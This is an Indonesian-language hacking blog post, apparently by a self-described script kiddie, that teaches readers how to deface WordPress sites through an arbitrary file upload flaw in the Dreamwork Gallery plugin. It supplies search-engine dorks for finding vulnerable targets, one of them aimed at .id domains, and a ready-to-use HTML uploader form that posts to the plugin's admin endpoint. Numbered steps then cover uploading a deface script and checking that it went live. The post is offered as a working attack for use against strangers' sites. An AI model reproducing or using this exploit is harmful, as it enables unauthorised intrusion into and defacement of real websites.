Deface CMS WordPress Metode Exploit Dreamwork Gallery
 |
| Deface CMS WordPress Metode Exploit Dreamwork Gallery |
Selamat malam para bokepers, oke kali ini gw mau bahas tehnik deface dengan memanfaatkan bug di Plugin CMS Wordpress, entah kapan tehnik ini ditemukan gw jg kgx ngerti yahh, exploit ini untuk plugin Dreamwork Gallery.
Dork Dreamwork Gallery
Gunakan imajinasi ente untuk dapetin target yang verawan :Dinurl:/wp-content/plugins/wp-dreamworkgallery/
inurl:/wp-dreamworkgallery/ site:.id
Script Uploader
Bisa di download di sini [ PASTEBIN ]atau bisa copy langsung nih script dibawah ini :D
<html>www.site.com = ganti dengan domain target anda :v
<body>
<form action="http://www.site.com/[path]/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
[path] = jika target ada path, jika tidak iya langsung di tusuk jahh :D
Langkah Exploit Dreamwork Gallery
1. Buka browser tercinta anda, copy Dork dan paste di Search Engine ente, akan muncul banyak target yang tampil tuh, bisa di lihat dibawah ini. |
| Deface CMS WordPress Metode Exploit Dreamwork Gallery |
2. Pilih salah satu target, buka di tab baru, kurang lebih seperti dibawah ini, gx usah di pentingin ini mah, yg penting kita ambil URL domainnya aja :D
 |
| Deface CMS WordPress Metode Exploit Dreamwork Gallery |
3. Copy Script Uploadernya, paste di Notepad simpan dengan nama [ uploader.html ].
 |
| Deface CMS WordPress Metode Exploit Dreamwork Gallery |
4. Lalu buka file [ uploader.html ] di browser seperti dibawah ini :D
 |
| Deface CMS WordPress Metode Exploit Dreamwork Gallery |
5. Klik Browse dan pilih script Deface ente seperti dibawah ini :D, pilih script deface dan klik Open, Habis itu klik Submit untuk proses Uploadnya.
 |
| Deface CMS WordPress Metode Exploit Dreamwork Gallery |
6. Tunggu beberapa saat, jika muncul seperti dibawah ini kemungkinan berhasil :D, Copy URL yang diblock itu, dan paste di browser.
 |
| Deface CMS WordPress Metode Exploit Dreamwork Gallery |
7. Jika berhasil maka akan tampil dah script deface ente :D
 |
| Deface CMS WordPress Metode Exploit Dreamwork Gallery |
Udah gitu ajaa,, simple banget kann. Gunakan otak mesum anda untuk mencari target yang verawan brooww :v
Sumber
http://www.tkjcyberart.org/2017/04/exploit-dreamwork-gallery-file-upload.html\\ ::::::::::::::: || My Contact || ::::::::::::::: //
>> Facebook ** Abdur Rozak (Script Kiddie)
>> Twitter ** @JackTersakiti
>> Youtube ** Jack Holeader | Siti Nur Holida
>> Instagram ** jack_holida
>> BBM ** 57318B69
>> LINE ** jack_tersakiti
// :::::::: || Why So Serious || ::::::::: \\
0 Komentar